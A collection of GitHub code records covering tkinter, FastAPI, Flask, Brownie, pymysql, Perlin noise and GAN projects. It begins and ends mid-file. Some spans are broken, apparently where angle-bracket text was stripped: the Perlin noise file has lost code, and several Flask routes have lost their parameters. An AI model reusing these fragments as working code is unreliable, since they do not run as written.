ord('q'):\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","repo_name":"LatentFreedom/ShoulderSurfingDetection","sub_path":"OpenCV_Exercises/VideoInput.py","file_name":"VideoInput.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25207267707","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom process import main\n\nclass Generator_card_Shuffle(ttk.Frame):\n # default\n name_file_to_count = 'A'\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n file_to_count = tk.StringVar()\n\n self.label_file_to_count = ttk.Label(self, text='Counting Flop Pattern')\n self.label_file_to_count.grid(row=0, column=0, columnspan=4, sticky='N',pady=15)\n self.label_name_file_to_count = ttk.Label(self, text=\"Name file to count:\")\n self.label_name_file_to_count.grid(row=1, column=0, sticky=tk.W)\n self.entry_number_of_rows = ttk.Entry(self, width=10, textvariable=file_to_count)\n self.entry_number_of_rows.grid(row=1, column=1, sticky=tk.W, padx=5)\n\n self.button_counting = ttk.Button(self, text=\"Counting\", command=self.counting)\n self.button_counting.grid(row=4, column=0, columnspan=4, pady=20, sticky=\"N\")\n\n self.name_file_to_count = file_to_count.get()\n\n option_list = ('Count_All','Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)')\n self.option_menu = ttk\n value = tk.StringVar(self)\n value.set('เลือก Option')\n self.option_menu = tk.OptionMenu(self, value, *option_list)\n self.option_menu.config(width=10)\n self.option_menu.grid(row=2, column=0, columnspan=2, pady=5, sticky=\"N\")\n self.value = value\n\n def get_option(self):\n return self.value.get()\n\n\n def counting(self):\n self.name_file_to_count = self.entry_number_of_rows.get()\n if self.get_option() == 'Count_All':\n main(self.name_file_to_count,['Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)'])\n else:\n main(self.name_file_to_count,[self.get_option()])\n self.popup()\n\n def popup(self):\n self.popup_window = tk.Toplevel()\n self.popup_window.title(\"Done!\")\n self.popup_window.geometry(\"150x50\")\n self.popup_window.resizable(False, False)\n self.popup_window.wm_attributes(\"-topmost\", 1)\n self.button_counting = ttk.Button(self.popup_window, text=\"OK\", command=self.popup_window.destroy)\n self.button_counting.grid(row=3, column=0, columnspan=4, pady=20, sticky=\"N\")\n self.button_counting.pack()\n\n\n\n\nif __name__ == \"__main__\":\n app = tk.Tk()\n app.title(\"Flop Counting\")\n app.geometry(\"250x170\")\n app = Generator_card_Shuffle(master=app)\n app.mainloop()\n","repo_name":"JamesAsuraA93/Excel_main","sub_path":"counting/app_counting.py","file_name":"app_counting.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11284933362","text":"from fastapi import FastAPI, File, HTTPException\n\n# Please see https://dhali.io/docs/#/ for more info\n\n# \n\napp = FastAPI()\n\n# \n\n@app.put(\"/run/\")\nasync def infer(input: bytes = File()):\n\n try:\n # You must extract the input to the model from `input`.\n #\n # If `input` is a text 
string:\n # text=input.decode(\"utf-8\")\n #\n # If `input` is a json object:\n # import json\n # json_input = json.loads(input.decode(\"utf-8\"))\n #\n # If `input` is an image:\n # from PIL import Image\n # image = Image.open(io.BytesIO(input))\n #\n # If `input` is an image base64 embedded into a json:\n # import json\n # import base64\n # json_input = json.loads(input.decode(\"utf-8\"))\n # img_data = json_input[\"image\"].encode()\n # content = base64.b64decode(img_data)\n #\n # \n # \n # \n #\n # The format of the result can be anything returnable from a FastAPI\n # endpoint. E.g.:\n\n return {\"results\": \"CALCULATED RESULT\"}\n \n except Exception as e:\n raise HTTPException(422, f\"Your input could not be parsed: {e}\")\n","repo_name":"Dhali-org/Dhali-asset-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41307310409","text":"import argparse\nfrom songs import get_songs, extract_details\nfrom matches import matches \nfrom playlist import extract_id_from_uri\nimport json\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Use a query string to search a list of spotify playlists')\n\n parser.add_argument('--playlist', \"-p\", help=\"spotify playlist URI\", required=True, action=\"append\")\n parser.add_argument('--query', \"-q\", help=\"query string\", required=True)\n parser.add_argument('--verbose', \"-v\", help=\"verbose output\", action=\"store_false\", default=False)\n return parser.parse_args()\n\ndef build_url(uri):\n return \"https://open.spotify.com/playlist/\" + extract_id_from_uri(uri)\n\ndef run():\n args = get_args()\n urls = [build_url(uri) for uri in args.playlist]\n songs = [song for url in urls for song in get_songs(url)]\n\n matched_songs = matches(args.query, songs)\n if args.verbose:\n print(json.dumps(matched_songs))\n else:\n print(json.dumps([extract_details(song) for song in matched_songs]))\n\nif __name__ == \"__main__\":\n run()","repo_name":"dandandy/spotplaylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20889295813","text":"#!/usr/bin/env python3\n\nimport os, sys, json\nimport pandas as pd\nimport numpy as np\nfrom pyvis.network import Network\n\n\ndef run_PageRank(filein):\n \"\"\"Run PageRank.py and create a file to save results.\n\n Args:\n filein (str): File path of a file fotmated as follow :\n fromNode\\ttoNode\\n\n fromNode\\ttoNode\\n\n etc\n \"\"\" \n os.system(f\"python PageRank.py {filein} > {os.path.join('output','results.txt')}\")\n\ndef convert_results_txt2json():\n \"\"\"Convert results.txt (created by run_PageRank function) to json format.\n \"\"\" \n with open(os.path.join('output','results.txt'), \"r\") as filein:\n with open(os.path.join('output','results.json'), \"w\") as fileout:\n fileout.write(\"[\")\n for line in filein:\n fileout.write(\"{\" + line.strip().replace(\"\\t\", \":\") + \"},\\n\")\n fileout.write('{\"-1\" : {\"rank\":0.0,\"AdjacencyList\":[]}}\\n]')\n\ndef get_rank_df():\n \"\"\"Create Dataframe : rank = pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \"\"\"\n id = []\n pagerank = []\n redirect_list = []\n with open(os.path.join('output','results.json'), \"r\") as f:\n results = json.load(f)\n for elm in results:\n id.append(int(list(elm.keys())[0]))\n 
pagerank.append(list(elm.values())[0][\"rank\"])\n redirect_list.append(list(elm.values())[0][\"AdjacencyList\"])\n return pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \ndef get_net_df():\n \"\"\"Create Dataframe : net = pd.DataFrame({\"source\":source, \"target\":target})\n \"\"\"\n source = []\n target = []\n with open(filein, \"r\") as f:\n for line in f:\n line = line.strip().split('\\t')\n source.append(int(line[0]))\n target.append(int(line[1]))\n return pd.DataFrame({\"source\":source, \"target\":target})\n\ndef get_topn_df(rank, net, n):\n \"\"\"Get Top n sort by pagerank from net DataFrame\n \"\"\"\n topn = rank[[\"id\", \"pagerank\"]].sort_values(by=\"pagerank\", ascending=False)[:n]\n print(f\"\\nTop {n} nodes :\\n\", topn)\n return net[net.source.isin(topn.id)].astype(str)\n \ndef visualization(net_topn) :\n network = Network(height='1000px', width='100%', bgcolor='#222222', font_color='white')\n network.barnes_hut()\n \n sources = net_topn.source\n targets = net_topn.target\n weights = np.ones(len(net_topn))\n for src, dst, w in zip(sources, targets, weights):\n network.add_node(src, src, title=src)\n network.add_node(dst, dst, title=dst)\n network.add_edge(src, dst, value=w)\n\n neighbor_map = network.get_adj_list()\n\n # add neighbor data to node hover data\n for node in network.nodes:\n node['value'] = len(neighbor_map[node['id']]) * 100\n\n network.show_buttons(filter_=['physics'])\n network.show(os.path.join('output','network.html'))\n \n \nif __name__==\"__main__\":\n \n if len(sys.argv)<2:\n raise Exception(\"Missing arguments\")\n filein = sys.argv[1]\n \n os.makedirs('output', exist_ok = True)\n if not os.path.isfile(os.path.join('output','results.txt')):\n print('run')\n run_PageRank(filein)\n if not os.path.isfile(os.path.join('output','results.json')):\n convert_results_txt2json()\n \n # Get top n\n rank = get_rank_df()\n net = get_net_df()\n net_topn = get_topn_df(rank, net, 5)\n\n # Visualization\n visualization(net_topn)\n","repo_name":"amait41/pagerank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11567243425","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n\n weight = 0\n score = 0\n for pair in my_list:\n a, b = pair\n score += a * b\n weight += b\n return score / weight\n","repo_name":"Ella711/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33339250689","text":"from flask import Blueprint, render_template, abort, Flask, request, send_from_directory\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport json\nfrom flask.ext.jsonpify import jsonify\n\nbadge = Flask(__name__)\nbadge.config.from_object('badges.config')\ndb = SQLAlchemy(badge)\nfrom badges import models\nfrom badges.models import *\nbadges = Blueprint('badges', 'badges')\n\n#========= The above part will be more or less the same for all GDE =======#\n\n#========================= Non-route functions ============================#\n\ndef add_user(username):\n me = User(username)\n db.session.add(me)\n db.session.commit()\n return\n\ndef find_user_force(username):\n user = User.query.filter_by(nickname=username).first()\n if user 
is None:\n add_user(username)\n user = User.query.filter_by(nickname=username).first()\n return user\n\ndef find_badge(name):\n badge = Badge.query.filter_by(name=name).first()\n return badge\n\ndef delete_all_users(username):\n users = User.query.all()\n for user in users:\n db.session.delete(user)\n db.session.commit()\n\n#========================= Routes are defined below =======================#\n\n@badges.route('/', defaults={'page': 'index'})\ndef module_name(page):\n return 'Badges module'\n\n@badges.route('/users', methods=[\"GET\"])\ndef show_all_users():\n users = User.query.all()\n data = []\n for user in users:\n data.append({\n 'id': user.id,\n 'name': user.nickname\n })\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n@badges.route('/user/', methods=[\"GET\"])\ndef show_user(page):\n user = User.query.filter_by(nickname=page).first()\n badge_ids = UserBadge.query.filter_by(user_id=user.id)\n badges = []\n for b in badge_ids:\n badge = Badge.query.filter_by(id=b.badge_id).first()\n badges.append(badge.to_dict())\n data = ({\n 'id': user.id,\n 'name': user.nickname,\n 'badges': badges\n })\n return jsonify({\n 'success': True,\n 'message': 'User exist',\n 'data': data\n })\n\n@badges.route('/create', methods=[\"POST\"])\ndef create_badge():\n try:\n badge = Badge(request.form['name'], request.form['description'], request.form['image_name'])\n db.session.add(badge)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge added successfully'\n })\n\n@badges.route('/list', methods=[\"GET\"])\ndef show_all_badges():\n badges = Badge.query.all()\n data = []\n for badge in badges:\n data.append(badge.to_dict())\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n\n@badges.route('/award', methods=[\"POST\"])\ndef create_badge_user_mapping():\n try:\n user = find_user_force(request.form['username'])\n badge = find_badge(request.form['badge'])\n existing = UserBadge.query.filter_by(user_id=user.id, badge_id=badge.id).all()\n if len(existing) > 0:\n return jsonify({\n 'success': False,\n 'message': 'User already has this badge'\n })\n mapping = UserBadge(user, badge)\n db.session.add(mapping)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge awarded successfully'\n })\n\n@badges.route('/static/', methods=[\"GET\"])\ndef send_static(page):\n return send_from_directory('badges/static', page)","repo_name":"IIITSERC/SE_2016_GDE","sub_path":"srcGDE/badges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73102548329","text":"from brownie import(\n accounts,\n network,\n config,\n MockV3Aggregator,\n VRFCoordinatorMock,\n LinkToken,\n Contract,\n interface\n)\n\nDECIMALS = 18\nINITIALANSWER = 200000000000\n\nFORKED_ENVS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_DEVELOPMENT_ENVS = [\"development\", \"Ganache-local\"]\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\ndef get_account(index=None, id=None):\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_DEVELOPMENT_ENVS\n or network.show_active() in 
FORKED_ENVS\n ):\n return accounts[0]\n # if nothing above 3 statmens is true the below one will be done\n return accounts.add(config[\"Wallets\"][\"from_key\"])\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_DEVELOPMENT_ENVS:\n if len(contract_type) <= 0:\n deploy_mock()\n contract = contract_type[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n return contract\n\ndef deploy_mock():\n \n adbhut_print(f\"active network is {network.show_active()}\",\"=\")\n adbhut_print(\"Deploying MOCKS.....!!\",\"?\")\n MockV3Aggregator.deploy(\n DECIMALS, # Parameter that constructor takes this is _decimals\n INITIALANSWER, # Parameter that constructor takes _initialAnswer\n {\"from\": get_account()}, # since it is state change type\n )\n link_token = LinkToken.deploy({\"from\": get_account()})#deploying contract of link token\n VRFCoordinatorMock.deploy(link_token.address,{\"from\":get_account()})\n #deploying contract of VRFCoordinatorMock, tales link token address as input to contract \n adbhut_print(\"|||||||mock deployed|||||||\",\"=\")\n\ndef fund_with_link(\n contract_address, account=None, link_token=None, amount=100000000000000000\n): # 0.1 LINK\n account = account if account else get_account()\n link_token = link_token if link_token else get_contract(\"link_token\")\n tx = link_token.transfer(contract_address, amount, {\"from\": account})\n #OR\n # link_token_contract = interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(contract_address, amount, {\"from\": account})\n #before doing this make sure to copy pasete the link token interface file into your interfaces folder\n tx.wait(1)\n adbhut_print(\"Contract Funded!\")\n return tx\n\ndef adbhut_print(input_str,second_char=\"=\"):\n char_pairs=int((len(input_str))/2)\n if (len(input_str))%2==0:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}\\n{input_str}\\n{char_len}\")\n else:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}=\\n{input_str}\\n{char_len}=\")\n\n","repo_name":"KingSlayer-KS/SmartContract-LOTTERY","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43408240805","text":"import logging\nimport threading\nimport contextlib\n\nfrom pymysql.connections import Connection\nfrom pymysql.cursors import DictCursor, Cursor\n\nfrom .pool import PoolContainer, PoolIsFullException, PoolIsEmptyException\n\nlogger = logging.getLogger('pymysqlpool')\n\n__all__ = ['MySQLConnectionPool']\n\n\nclass NoFreeConnectionFoundError(Exception):\n pass\n\n\nclass PoolBoundaryExceedsError(Exception):\n pass\n\n\nclass MySQLConnectionPool(object):\n\n def __init__(self, pool_name, host=None, user=None, password=\"\", database=None, port=3306,\n charset='utf8', use_dict_cursor=True, max_pool_size=30,\n enable_auto_resize=True, auto_resize_scale=1.5,\n pool_resize_boundary=48,\n defer_connect_pool=False, **kwargs):\n\n \"\"\"\n 初始化连接池.\n :param pool_name: 连接池的队列名.\n :param host: 数据库host\n :param user: 数据库用户名\n :param password: 数据库密码\n :param database: 数据库名\n :param port: 数据库端口\n :param charset: 数据库编码\n :param use_dict_cursor: 是否使用dict游标\n :param max_pool_size: 最大连接数\n :param enable_auto_resize: 是否允许动态更改最大连接数\n :param 
pool_resize_boundary: 设置数据库允许的最大连接\n :param auto_resize_scale: 连接池动态更改最大比例\n :param kwargs: 其他`pymysql.Connection`配置项\n \"\"\"\n # 数据库连接配置\n self._host = host\n self._user = user\n self._password = password\n self._database = database\n self._port = port\n self._charset = charset\n self._cursor_class = DictCursor if use_dict_cursor else Cursor\n self._other_kwargs = kwargs\n\n # 数据库连接池配置\n self._pool_name = pool_name\n self._max_pool_size = max_pool_size if max_pool_size < pool_resize_boundary else pool_resize_boundary\n self._enable_auto_resize = enable_auto_resize\n self._pool_resize_boundary = pool_resize_boundary\n if auto_resize_scale < 1:\n raise ValueError(\n \"Invalid scale {}, must be bigger than 1\".format(auto_resize_scale))\n\n self._auto_resize_scale = int(round(auto_resize_scale, 0))\n self._pool_container = PoolContainer(self._max_pool_size)\n\n self.__safe_lock = threading.RLock()\n self.__is_killed = False\n self.__is_connected = False\n\n if not defer_connect_pool:\n self.connect()\n\n def __repr__(self):\n return ''.format(self.pool_name, self.size)\n\n def __del__(self):\n self.close()\n\n def __iter__(self):\n return iter(self._pool_container)\n\n @property\n def pool_name(self):\n return self._pool_name\n\n @property\n def pool_size(self):\n return self._pool_container.pool_size\n\n @property\n def free_size(self):\n return self._pool_container.free_size\n\n @property\n def size(self):\n return ''.format(self._pool_resize_boundary,\n self._max_pool_size,\n self.pool_size,\n self.free_size)\n\n @contextlib.contextmanager\n def cursor(self, cursor=None):\n with self.connection(True) as conn:\n assert isinstance(conn, Connection)\n cursor = conn.cursor(cursor)\n\n try:\n yield cursor\n except Exception as err:\n conn.rollback()\n raise err\n finally:\n cursor.close()\n\n @contextlib.contextmanager\n def connection(self, autocommit=False):\n conn = self.borrow_connection()\n assert isinstance(conn, Connection)\n old_value = conn.get_autocommit()\n conn.autocommit(autocommit)\n try:\n yield conn\n except Exception as err:\n # logger.error(err, exc_info=True)\n raise err\n finally:\n conn.autocommit(old_value)\n self.return_connection(conn)\n\n def connect(self):\n \"\"\"\n 启动连接池\n \"\"\"\n if self.__is_connected:\n return\n\n logger.info('[{}] Connect to connection pool'.format(self))\n\n test_conn = self._create_connection()\n try:\n test_conn.ping()\n except Exception as err:\n raise err\n else:\n with self.__safe_lock:\n self.__is_connected = True\n\n self._adjust_connection_pool()\n finally:\n test_conn.close()\n\n def close(self):\n \"\"\"\n 关闭连接池\n \"\"\"\n try:\n logger.info('[{}] Close connection pool'.format(self))\n except Exception:\n pass\n\n with self.__safe_lock:\n if self.__is_killed is True:\n return True\n\n self._free()\n\n with self.__safe_lock:\n self.__is_killed = True\n\n def borrow_connection(self):\n \"\"\"\n 从连接池中获取一个连接\n \"\"\"\n block = True\n\n while True:\n conn = self._borrow(block)\n if conn is None:\n block = not self._adjust_connection_pool()\n else:\n return conn\n\n def _borrow(self, block):\n try:\n connection = self._pool_container.get(block, None)\n except PoolIsEmptyException:\n return None\n else:\n # 检查连接是否还存活\n connection.ping(reconnect=True)\n return connection\n\n def return_connection(self, connection):\n \"\"\"\n 将使用完连接放回��接池\n \"\"\"\n return self._pool_container.return_(connection)\n\n def _adjust_connection_pool(self):\n \"\"\"\n 动态调整连接池大小.\n \"\"\"\n # 创建几个新连接\n logger.debug('[{}] Adjust connection pool, '\n 'current size 
is \"{}\"'.format(self, self.size))\n\n if self.pool_size >= self._max_pool_size:\n if self._enable_auto_resize:\n self._adjust_max_pool_size()\n\n try:\n connection = self._create_connection()\n except Exception as err:\n logger.error(err)\n return False\n else:\n try:\n self._pool_container.add(connection)\n except PoolIsFullException:\n logger.debug('[{}] Connection pool is full now'.format(self.pool_name))\n return False\n else:\n return True\n\n def _adjust_max_pool_size(self):\n with self.__safe_lock:\n self._max_pool_size *= self._auto_resize_scale\n if self._max_pool_size > self._pool_resize_boundary:\n self._max_pool_size = self._pool_resize_boundary\n logger.debug('[{}] Max pool size adjusted to {}'.format(self, self._max_pool_size))\n self._pool_container.max_pool_size = self._max_pool_size\n\n def _free(self):\n \"\"\"\n 释放所有连接\n \"\"\"\n for connection in self:\n try:\n connection.close()\n except Exception as err:\n _ = err\n\n def _create_connection(self):\n \"\"\"\n 创建pymysql连接\n \"\"\"\n return Connection(host=self._host,\n user=self._user,\n password=self._password,\n database=self._database,\n port=self._port,\n charset=self._charset,\n cursorclass=self._cursor_class,\n **self._other_kwargs)\n","repo_name":"JeniTurtle/python-orm","sub_path":"libs/database/connect_pool/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73580911848","text":"\"\"\"Perlin noise\n\"\"\"\n\nimport math\n\nfrom random import Random\n\n\nPERLIN_YWRAPB = 4\nPERLIN_YWRAP = 1<>= 1;\n\n\ndef noise(*args):\n \"\"\"Computes the Perlin noise (1D, 2D, or 3D) value at the specified coords.\n \"\"\"\n global perlin, perlinRandom\n\n x = args[0]\n y = args[1] if len(args) > 1 else 0\n z = args[2] if len(args) > 2 else 0\n\n if perlinRandom is None:\n perlinRandom = Random()\n\n if perlin is None:\n perlin = [perlinRandom.random() for i in xrange(PERLIN_SIZE + 1)]\n\n x = abs(x)\n x = abs(x)\n z = abs(z)\n\n xi, yi, zi = int(x), int(y), int(z)\n xf, yf, zf = x - xi, y - yi, z - zi\n\n r = 0\n ampl = 0.5\n\n for i in range(perlin_octaves):\n of = xi + (yi<= 1.0: xi += 1; xf -= 1;\n if yf >= 1.0: yi += 1; yf -= 1;\n if zf >= 1.0: zi += 1; zf -= 1;\n\n return r;\n\n# [toxi 031112]\n# now adjusts to the size of the cosLUT used via\n# the new variables, defined above\ndef noise_fsc(i):\n # using bagel's cosine table instead\n return 0.5 * (1.0 - perlin_cos_table[int(i*perlin_PI) % perlin_TWOPI])\n\n# # [toxi 040903]\n# # make perlin noise quality user controlled to allow\n# # for different levels of detail. 
lower values will produce\n# # smoother results as higher octaves are surpressed\n\n# public void noiseDetail(int lod) {\n# if (lod>0) perlin_octaves=lod;\n# }\n\n# public void noiseDetail(int lod, float falloff) {\n# if (lod>0) perlin_octaves=lod;\n# if (falloff>0) perlin_amp_falloff=falloff;\n# }\n\ndef noiseSeed(what):\n global perlinRandom, perlin\n if perlinRandom is None:\n perlinRandom = Random()\n perlinRandom.seed(what)\n perlin = None\n\n","repo_name":"croach/p5.py","sub_path":"lib/p5/perlin.py","file_name":"perlin.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29128147111","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers import (Dense, \n BatchNormalization, \n LeakyReLU, \n Reshape, \n Conv2DTranspose,\n Conv2D,\n Dropout,\n Flatten)\nfrom matplotlib import image\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nIMAGE_SIZE = [256, 256]\n\ndef decode_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = (tf.cast(image, tf.float32) / 127.5) - 1\n image = tf.reshape(image, [*IMAGE_SIZE, 3])\n return image\n\ndef read_tfrecord(example):\n tfrecord_format = {\n \"image\": tf.io.FixedLenFeature([], tf.string)\n }\n example = tf.io.parse_single_example(example, tfrecord_format)\n image = decode_image(example['image'])\n return image\n\ndef load_dataset(filenames):\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(read_tfrecord)\n return dataset\n\ndef down_sample(filters, size, apply_instancenorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2D(filters, size, strides=2, padding='same', kernel_initializer=initializer, use_bias=False))\n\n if apply_instancenorm:\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n layer.add(layers.LeakyReLU())\n\n return layer\n\ndef up_sample(filters, size, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2DTranspose(filters, size, strides=2, padding='same', kernel_initializer=initializer,use_bias=False))\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n if apply_dropout:\n layer.add(layers.Dropout(0.5))\n\n layer.add(layers.ReLU())\n\n return layer\n\ndef Generator():\n inputs = layers.Input(shape=[256,256,3])\n down_stack = [\n down_sample(64, 4, apply_instancenorm=False),# (size, 128, 128, 64)\n down_sample(128, 4), # (size, 64, 64, 128)\n down_sample(256, 4), # (size, 32, 32, 256)\n down_sample(512, 4), # (size, 16, 16, 512)\n down_sample(512, 4), # (size, 8, 8, 512)\n down_sample(512, 4), # (size, 4, 4, 512)\n down_sample(512, 4), # (size, 2, 2, 512)\n down_sample(512, 4), # (size, 1, 1, 512)\n ]\n\n up_stack = [\n up_sample(512, 4, apply_dropout=True), # (size, 2, 2, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 4, 4, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 8, 8, 1024)\n up_sample(512, 4), # (size, 16, 16, 1024)\n up_sample(256, 4), # (size, 32, 32, 512)\n up_sample(128, 4), # (size, 64, 64, 256)\n up_sample(64, 4), # (size, 128, 128, 128)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = 
layers.Conv2DTranspose(3, 4, strides=2, padding='same', kernel_initializer=initializer, activation='tanh') \n # (size, 256, 256, 3)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return keras.Model(inputs=inputs, outputs=x)\n\ndef make_generator_model():\n model = tf.keras.Sequential()\n model.add(Dense(7*7*512, use_bias=False, input_shape=(256,))) #originally 7*7*7, 256*256\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Reshape((7,7,512)))#was 7,7,512\n# assert model.output_shape == (None, 7, 7, 512) # Note: None is the batch size\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False)) #originally 128\n# assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n \n model.add(Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False)) #originally 64\n# assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))#originally 3\n# print(model.output_shape)\n# assert model.output_shape == (None, 28, 28, 3)\n return model\n\n\ndef randomNoiseModel(file):\n gen = make_generator_model()\n gen.load_weights('models/generator4.h5')\n\n noise = tf.random.normal([3, 256])*127.5+100\n plt.imsave('static/input.png', noise.numpy())#.clip(0, 1))\n\n modelOutput = gen(noise)[0]\n plt.imsave(f'static/{file}', modelOutput.numpy().clip(0, 1))\n\n\ndef monetModel(fileIn, fileOut):\n\n print(fileIn)\n monet_generator = Generator()\n monet_generator.load_weights('models/vangogh_generator.h5')\n for img in load_dataset(f'static/{fileIn}').batch(1):\n inputImage = img\n\n inputSaveImage = inputImage[0].numpy().clip(0,1)\n plt.imsave('static/input.png', inputSaveImage)\n\n #inputImage = image.imread(f'static/test3.jpg')\n\n #monet_ds = load_dataset(MONET_FILENAMES).batch(1)\n #modelInput = tf.reshape(tf.convert_to_tensor(image.imread(f'static/test3.jpg')), [1, 256, 256, 3])\n #modelInput = tf.random.normal([1, 256, 256, 3])#*127.5+100\n \n\n #modelOutput = monet_generator(modelInput)[0]\n modelOutput = monet_generator(inputImage, training=False)[0].numpy().clip(0,1)\n plt.imsave(f'static/{fileOut}', modelOutput)","repo_name":"CornellDataScience/GAN-Art-Generation","sub_path":"flask-app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13821988038","text":"from math import sqrt\nimport numpy as np\nfrom KJ import grad_projected\nfrom JS import barrier_method\n\n\nc = 3e5 # km / sec\n# Return path delay between two nodes\n\n\ndef delay(loc_1, loc_2):\n x = loc_1[0] - loc_2[0]\n y = loc_1[1] - loc_2[1]\n return sqrt(x * x + y * y) / c * 10 # multiplied by 10 for scaling\n\n\ndef delay_return(locations_source, locations_server):\n '''\n\tInputs: two layers location coordinates (array)\n\tOutputs: two layers delay matrix (array)\n\t'''\n\n m = len(locations_source)\n n = len(locations_server)\n delay_matrix = np.zeros((m, n))\n for i in range(m):\n for k in range(n):\n delay_matrix[i, k] = delay(locations_source[i], locations_server[k])\n 
